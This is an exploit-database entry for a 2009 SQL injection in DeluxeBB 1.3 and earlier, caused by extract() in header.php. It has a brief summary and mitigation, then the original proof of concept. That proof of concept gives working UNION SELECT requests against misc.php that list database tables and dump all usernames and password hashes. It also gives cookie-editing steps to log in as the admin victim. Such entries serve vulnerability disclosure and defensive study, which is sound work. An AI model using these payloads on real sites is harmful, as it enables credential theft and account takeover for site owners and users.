DeluxeBB SQL Injection

vendor:

DeluxeBB

by:

girex

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: DeluxeBB

Affected Version From: 1.3 and prior

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: a:deluxebb:deluxebb

Metasploit:

Other Scripts:

Platforms Tested:

2009

This SQL injection allows an attacker to retrieve the username and md5 of all registered users of the site. The vulnerability is caused by the extract() function used in header.php. The attacker can set an arbitrary value to the var $qorder if $order has a value not expected.

Mitigation:

The vulnerability can be mitigated by removing or properly securing the extract() function used in header.php. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Author:	girex
# Homepage:	girex.altervista.org
# Date:		18/03/2009

# CMS:		DeluxeBB 1.3 and prior
# site:		deluxebb.com

# NOTE: 	- Works regardless of php.ini settings
		
		- This SQL injection will shows you username and md5
		  of ALL registered users of the site.
		
		- This PoC was written for educational purpose. Use it at your own risk.
		  Author will be not responsible for any damage.

----------------------------------------------------------------------------------------

# Vuln description:
# DeluxeBB suffers many SQL Injections. They are caused, in part, by the extract() function
# used in header.php. I think this is a very bad practice. Attacker doesn't need
# register_globals turned On, and in this case that i'm showing you magic_quotes 
# turned Off too.

# file: misc.php    lines: 461-464

	if($order == "name") { $qorder = "ORDER BY username"; }
	if($order == "regdate") { $qorder = "ORDER BY joineddate"; }
	if($order == "posts") { $qorder = "ORDER BY posts"; }
	if($order == "lastpost") { $qorder = "ORDER BY lastpost"; }

# This sequence of if does not provide an else..

# file: misc.php    line: 490

	$getsel = $db->query("SELECT * FROM ".$prefix."users ".$qfilter." ".$qorder."  <==
		             ".$sort." LIMIT ".$pageinfo[0].",".$pageinfo[1]);

# An attacker can set an arbitrary value to the var $qorder if $order
# has a value not expected.

----------------------------------------------------------------------------------------

# PoC:
# I reccomend to use first of all this SQL Injection to retrieve all table's name
# of the database thanks to informatin_schema. You can use it to retrieve the table prefix
# of the CMS.

GET [target]/[path]/misc.php?sub=memberlist&order=1&
qorder=UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name,16,17,18,19,20,21,22,23,24,25,26,27,28,29+
FROM+information_schema.tables%23&sort=ASC&filter=all&searchuser=.&submit=1

----------------------------------------------------------------------------------------

# Real PoC:
# This SQL Injection will shows you ALL usernames and password hashes of the CMS.

GET [target]/[path]/misc.php?sub=memberlist&order=1&
qorder=UNION+ALL+SELECT+uid,username,3,4,membercode,6,7,8,9,10,11,12,13,14,pass,16,17,18,19,20,21,22,23,24,25,26,27,28,29+
FROM+deluxebb_users%23&sort=ASC&filter=all&searchuser=.&submit=1

----------------------------------------------------------------------------------------

# NOTE: to get admin's access edit your cookies:

# memberid 	=>   	victim's id
# membercookie  =>	victim's username
# memberpw  	=> 	victim's md5

----------------------------------------------------------------------------------------

girex

# milw0rm.com [2009-03-18]